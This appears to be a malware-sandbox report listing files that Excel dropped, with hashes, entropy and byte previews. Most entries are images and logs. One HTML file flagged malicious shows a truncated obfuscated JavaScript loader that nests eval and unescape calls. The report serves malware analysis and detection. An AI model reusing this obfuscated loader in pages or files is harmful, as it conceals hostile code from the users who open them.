          SHA1:1CBF9F9B4F8775BDAC8918E4C7BE0D8ED37E22BC
          SHA-256:57E3543ECB492B9DDFD2B532799F34198F099C9B0A77D764307D67C3454E757A
          SHA-512:0A0BE7A86BA99CD3964F7ACA648BC83E1C7294517F46E69A142A2D37BA1DB00F72E70DD3377E0F593CE79CB9CCA102C2A70A1429790893D6E7B7997D822B342F
          Malicious:false
          Preview:....l...........................Z....G.. EMF....@V..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):109544
          Entropy (8bit):4.282675970330063
          Encrypted:false
          SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
          MD5:F7B9A8F20E64B2CB6B572BCBA5866236
          SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
          SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
          SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
          Malicious:false
          Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8184
          Entropy (8bit):2.134027179798306
          Encrypted:false
          SSDEEP:96:EV5g2s88nDfgs/I5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:EaoRfWZ4V79FdigmR7qii1Bo
          MD5:331C2C9C442C76A749D84D57B5515818
          SHA1:E754B0650D15D892EEC8B24DA991AED1290B5D96
          SHA-256:D9BF530C063351C003E3CCFF707D0A25C27BE3E00F225AEFE46099B8BA450C2F
          SHA-512:62302CABE9FB5749ED6B1DDDBF539DB50044E6619571F9E0B7E2FFD05D4ECC6717DE080405DED6CE84712DC3D4E8B6FD423ADE32BBB45144DE3777EFC73CD2D6
          Malicious:false
          Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8184
          Entropy (8bit):2.134027179798306
          Encrypted:false
          SSDEEP:96:EV5g2s88nDfgs/I5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:EaoRfWZ4V79FdigmR7qii1Bo
          MD5:331C2C9C442C76A749D84D57B5515818
          SHA1:E754B0650D15D892EEC8B24DA991AED1290B5D96
          SHA-256:D9BF530C063351C003E3CCFF707D0A25C27BE3E00F225AEFE46099B8BA450C2F
          SHA-512:62302CABE9FB5749ED6B1DDDBF539DB50044E6619571F9E0B7E2FFD05D4ECC6717DE080405DED6CE84712DC3D4E8B6FD423ADE32BBB45144DE3777EFC73CD2D6
          Malicious:false
          Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):152108
          Entropy (8bit):2.3627562871289216
          Encrypted:false
          SSDEEP:1536:cNkRory4tU9MBFjvSO6E/cq9N6hvkFrRYgn:wccn
          MD5:6A87516E938E1530AE4F7FDF4670B05A
          SHA1:4582781E2CFD03820919D67DF96362DF635C8087
          SHA-256:EE1D4A8E36A896B37F6DD108FB9414141E78190FE0253DF1063A9411B0120DB6
          SHA-512:13A43E60FE7BDD1610377C5DDA58EB981DBE5CC3222F05BC72405FCF8447E5851D5126E2E07BB386158BB4EABBF01B69B7F3E17023EB86A16022C017FB30390D
          Malicious:false
          Preview:....l...........................Z....G.. EMF....,R..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):98872
          Entropy (8bit):2.316132467488738
          Encrypted:false
          SSDEEP:768:XOqdv71DW7ohBb66mQK4BTo/qQbApQK6c:+oec
          MD5:7F8C4AD84576EEFDD578F092285BA14D
          SHA1:CFD5978A3E375750F9D65FA29CD294990CC4024D
          SHA-256:9BA33D6062877DCDB63F2F25E0B573DB82C08A85EFE52BB21A35A8D5F869997E
          SHA-512:89C06BF3707FF8B7B35B4B988A16EA07C34DF877976C92F3E1FD9422AF1BDCDC691655E870DE7B28D2B7C3D25D635A327B168432262A15CC2B262646F0C9B052
          Malicious:false
          Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):1293620
          Entropy (8bit):4.563127917199792
          Encrypted:false
          SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
          MD5:F71C973B5E362DFD6408D6C009E5643E
          SHA1:24B3CE67B31BFD4791287932206D54C73489424E
          SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
          SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
          Malicious:false
          Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):98872
          Entropy (8bit):2.3151137784487137
          Encrypted:false
          SSDEEP:768:XOsVvdx1DW7ohBb66mQK4BTon/qQbApQK6c:+iSc
          MD5:A5270F0C091DF47490645830646D356D
          SHA1:0D8F595E0E463A619B58E741656B133E40767192
          SHA-256:D0F89963A44CF1E6A403484C777BEA9D4168AA40B1C93ACAF8F1104844528AF9
          SHA-512:133C1C16E7AF1543130821B5891A40DAEA827247CCE496484CE2DFE3067ED4E666A178D211DBBF01C1B449C9DFDBC149C5BAF01A50B23ED3B85676ADB2F534B8
          Malicious:false
          Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8208
          Entropy (8bit):2.1358176547349985
          Encrypted:false
          SSDEEP:96:Eeg2s88nDfgQI5i9FWZBKlA2B79sIRdYZgmR7qii1Bo1V:E/oxUWZ4V79FdigmR7qii1Bo
          MD5:9A02253633B88051016119306621F02D
          SHA1:11F7C54D07DFFA0666D26411F0D0D43C19013715
          SHA-256:CF4FDF5692F2BC637C3FE4AF8F4802E7F86AECEF645EAA35AAEA5C52ED651826
          SHA-512:B01758057A1249BCC27B8FA59BC700EC93192D6E64D2CB5D9457FB09E97C34ADCAF64D795ECBA95E4539BF60770EC68BDC0A824D0A0F93C46DDA223DA3DFBE14
          Malicious:false
          Preview:....l...........{...U............A...... EMF..... ..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):150296
          Entropy (8bit):2.3708495163685557
          Encrypted:false
          SSDEEP:1536:zH7mBGzZQJYAkQDnGvVf1oLJknhmUI/FadE:YIrE
          MD5:3D4DDFCEA4BFB084B143B0C884440E13
          SHA1:4B20542D5A75D0166122E7A71774EFD360FB32B7
          SHA-256:57AD919ADB20066274D6C9503BAFFC979F88B92AA00A2E01BD4FD2D7BA46BD08
          SHA-512:D30F647EE4BD524C2381482B97EB516DCFD342C2A4CFCF3AF2B037E84B058BE2B914380DCB743047B6E4399230AE64ECEDE4250788220DFEA241A2245412CDF0
          Malicious:false
          Preview:....l...........................Z....G.. EMF.....K..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8184
          Entropy (8bit):2.149090969455751
          Encrypted:false
          SSDEEP:96:EV5g2s88nDfgsJb5RO9AWZBuA2B79sIRdYZgmR7qii1Bo1V:Eaoe/WZ879FdigmR7qii1Bo
          MD5:CAB92C3C706726A7859C38F645BD603A
          SHA1:CDDDA2409FC2C63B33AC37A728C45F4D789D32F0
          SHA-256:828A4E507F2DA2CF89D2EB056B624750597C13F3E8FCFF6D835DDF99248EB0F5
          SHA-512:7E944B572CF54B9EAB00617401005A6B13ED998BB8E401F8EBCA2644D509783BA7E8C409E8CB63D36A3FC2117AEA0DCF0A47FE441E2E94A88720AB179DC49933
          Malicious:false
          Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):149960
          Entropy (8bit):2.372576996817795
          Encrypted:false
          SSDEEP:1536:8+v+HOsZQJYAkQDnGvVf1oLJknhmUI/FeYH:obeH
          MD5:ADDA5F0BA7E0784DE526B6DA34B3A4F3
          SHA1:162A8F8F17D19730656156F2A6EC4961F16E0681
          SHA-256:35A67B142B019507188815C1A331E546D3C9A66454CDFF8DD9FEC900C3F8B917
          SHA-512:0534E38803D632014D03BEF7B0776B798185800003FB211F22892B8ECA7E42D3365E602787E151B7131B463E5442AE68BDA4F0F92A3D3B38C749FC9B59620569
          Malicious:false
          Preview:....l...........................Z....G.. EMF.....I..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):134544
          Entropy (8bit):2.9527588414114754
          Encrypted:false
          SSDEEP:768:P0WYNNkN2HtS1u40TiTKAvGNLnvfKx4t1cEU9W3V/DOEsx:pYN/Ni0TiTKeYjfKx4tCEU9W35psx
          MD5:83F48FDD46D3424E92E24E709EAB5960
          SHA1:6CEE65663B48B56BDFF6756C38C1F4190EAC6E12
          SHA-256:77F4BCE7FBE1E2F98A04DC51994467460B255135535CDE954EEE8180F500C6AE
          SHA-512:8F781049001FC063EDB9B4352C0EA05D8DA9DCFC599234A58258C6FB4C4CED2B862A701081F10B68E286124413AD04F4AAAB485D376B0A2FB04167AFF121F47E
          Malicious:false
          Preview:....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n........................................................@...............8/....X.....8/........................X...................N.8/@....y8/.....m8/|...............|.....................8/.................8/
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):98872
          Entropy (8bit):2.3151137784487137
          Encrypted:false
          SSDEEP:768:XOsVvdx1DW7ohBb66mQK4BTon/qQbApQK6c:+iSc
          MD5:A5270F0C091DF47490645830646D356D
          SHA1:0D8F595E0E463A619B58E741656B133E40767192
          SHA-256:D0F89963A44CF1E6A403484C777BEA9D4168AA40B1C93ACAF8F1104844528AF9
          SHA-512:133C1C16E7AF1543130821B5891A40DAEA827247CCE496484CE2DFE3067ED4E666A178D211DBBF01C1B449C9DFDBC149C5BAF01A50B23ED3B85676ADB2F534B8
          Malicious:false
          Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):44256
          Entropy (8bit):3.15066292565687
          Encrypted:false
          SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
          MD5:F1EC2E98B0F577B675156B13DCF94105
          SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
          SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
          SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
          Malicious:false
          Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):99352
          Entropy (8bit):2.316061241850459
          Encrypted:false
          SSDEEP:768:hOkJvt1Dr7ohr86uA4K4BTonxqQbApQK6c:Uuwc
          MD5:3916F538C06C4457A05ACF27CA943671
          SHA1:D6E6FEEC7084B6655832F3EAF566B96ED2867BFE
          SHA-256:1E28943CA9BEEB193E0948D24506480FFF6F0C826AD60615B32739BD42B661C6
          SHA-512:EAA85481C1695C395306050640169C3CD4C813AF78222DF5CBA637BB6350415BA6E2BC592807CFB07DC4FFE13CBDC42AF251C821DEC8E01C370400B6C880341B
          Malicious:false
          Preview:....l............................}...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8084
          Entropy (8bit):2.5551694039574895
          Encrypted:false
          SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
          MD5:721E8AAC81F0A6D4659831CB8194D668
          SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
          SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
          SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
          Malicious:false
          Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):44256
          Entropy (8bit):3.147465798679962
          Encrypted:false
          SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
          MD5:36D8FF25D14E7E2FBB1968E952FF9C17
          SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
          SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
          SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
          Malicious:false
          Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:HTML document, ASCII text, with very long lines (8810), with CRLF line terminators
          Category:dropped
          Size (bytes):8896
          Entropy (8bit):2.878591814356277
          Encrypted:false
          SSDEEP:192:tHaCEQ66dDJeum2oum25T6lS5KUJDVUKhC14GVf/Av66dDumAVYxequccVFArb7U:t1EQ66dDJeum2oum25T6lS5KUJDVUKhm
          MD5:DEC3461E0215192337302502C20CFB0C
          SHA1:17508DAB9F30150A7142C73E2D6E280511BC6F9E
          SHA-256:276A35425D98919D79AE668AF841EFC697448B18FF7729FBBC8C2DE034EABBB0
          SHA-512:730335E8A6437279A2494C5C91B28368BAC66FB0D0CAC444DFA0E73460B4ADCE5F06696E6AFF6138DA2C7DD95BB649F8C774CEAE55103AFB6CBD11EB37E65F92
          Malicious:true
          Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%63%25%33%38%25%33%38%25%36%34%25%36%32%25%36%36%25%33%35%25%36%36%25%33%35%25%33%32%25%33%30%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%31%25%33%37%25%33%30%25%33%32%25%33%36%25%33%37%25%33%37%25%33%39%25%32%32%25%32%39%25%33%62%25%30%61%
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):1394
          Entropy (8bit):2.6906950763610795
          Encrypted:false
          SSDEEP:24:YHUgIgKg3Lk+3M5HyuOqYp2ICey4jEGtPOC2qcOnUXiIjazYvKp5ZSmblhkGTRFb:YHUg0f+3iUFj/tPO3O5IjDKpdTzb
          MD5:9AD60AAAD68D33D393FC0F624545A316
          SHA1:C7EBE6E994857DD3B0B62EB63860FFE77832AE4C
          SHA-256:EBF00A5B90E8621A48BCD7714E20999C5D941955109261975411869A70D84BB4
          SHA-512:D2D3257A6414FF1D4D6FBFEA75B0F2ED159F30D3B6F2DE0CD4A30AA341F274E30155E4AE06F6774162C41A654BDCC09F923E2AE5636697E5B2EE6747CDAF6666
          Malicious:false
          Preview:3.7.4.6.3.7.8.,.1.1.9.6.3.7.8.,.6.3.6.4.3.3.4.,.3.7.4.6.3.7.6.,.1.0.7.,.2.5.5.0.5.0.8.8.,.1.0.4.9.5.2.3.4.,.1.0.1.,.1.1.9.,.1.2.4.,.1.1.9.6.2.9.3.,.7.0.0.9.9.8.4.,.6.3.6.4.3.3.1.,.6.5.4.2.1.8.5.1.,.1.5.6.1.9.5.8.,.1.0.0.,.1.2.5.,.6.3.6.4.3.3.2.,.1.2.8.,.1.0.3.,.1.0.4.,.1.0.5.,.1.0.6.,.1.0.8.,.1.0.9.,.1.1.2.,.1.1.4.,.1.1.8.,.1.2.0.,.3.0.0.4.9.2.6.8.,.1.2.1.,.5.4.5.6.5.4.3.,.1.2.2.,.1.2.3.,.1.2.6.,.;.9.,.3.0.1.5.3.7.2.1.,.3.,.4.0.6.9.3.5.8.2.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.7.,.2.7.3.6.0.0.9.5.,.2.6.4.8.5.7.8.4.,.6.1.7.0.7.3.0.7.,.3.3.7.9.1.6.2.,.3.2.9.4.5.8.7.9.9.,.2.4.6.0.9.2.5.8.,.1.3.5.2.5.8.6.,.4.8.1.9.5.5.3.8.,.5.7.9.9.9.6.6.1.,.3.4.1.4.8.5.6.8.,.6.5.4.0.2.1.5.,.3.0.1.2.3.4.6.6.,.1.3.,.6.3.7.1.6.9.4.,.3.7.4.6.3.7.9.,.2.7.1.5.3.4.9.7.,.5.8.4.2.5.8.6.0.,.6.3.0.6.3.0.9.9.,.4.,.5.9.2.2.3.4.3.7.,.1.0.6.9.5.5.2.,.1.1.7.,.1.4.6.1.9.5.3.,.5.2.9.1.0.0.0.2.,.1.3.5.2.5.8.7.,.2.5.4.8.7.8.5.4.,.1.0.,.1.0.2.3.8.6.4.,.2.0.1.3.1.9.0.1.,.1.5.,.1.0.2.3.6.3.8.,.1.6.5.7.4.5.2.,.1.2.7.,.1.6.5.7.4.5.3.,.1.
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):20971520
          Entropy (8bit):8.112143835430977E-5
          Encrypted:false
          SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
          MD5:AFDEAC461EEC32D754D8E6017E845D21
          SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
          SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
          SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
          Malicious:false
          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):20971520
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
          SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
          SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
          SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
          Malicious:false
          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):71
          Entropy (8bit):4.3462513114457515
          Encrypted:false
          SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
          MD5:8F4510F128F81A8BAF2A345D00F7E30C
          SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
          SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
          SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
          Malicious:false
          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:ASCII text, with very long lines (28533), with CRLF line terminators
          Category:dropped
          Size (bytes):20971520
          Entropy (8bit):0.18723792496282785
          Encrypted:false
          SSDEEP:1536:1iBUJZ2VzZ6FjpRoT0wxabjI4TMocSvN4Pi91shcTlLxJ1yNeoeIqYHqJFukO6Fh:0U2wFjoTPa59s+FR
          MD5:1480D85E7112CA5273922ADC6AB55D61
          SHA1:D33A063E6476C4D76904669C21B50BA76E64BB3A
          SHA-256:96C629B935C59D4AEC7B5E07BB13B02A9E6D3F88A23EFCC407F4576D89FD63ED
          SHA-512:6823199C3AE1AB56EFDFAE662E9956F85BC863E4BA07DDC6634F19A4C3A55FE34BD344ED9DAE0B33DE316B79F1A261A16ADB22C91BEA193ADAF92AADCA97278B
          Malicious:false
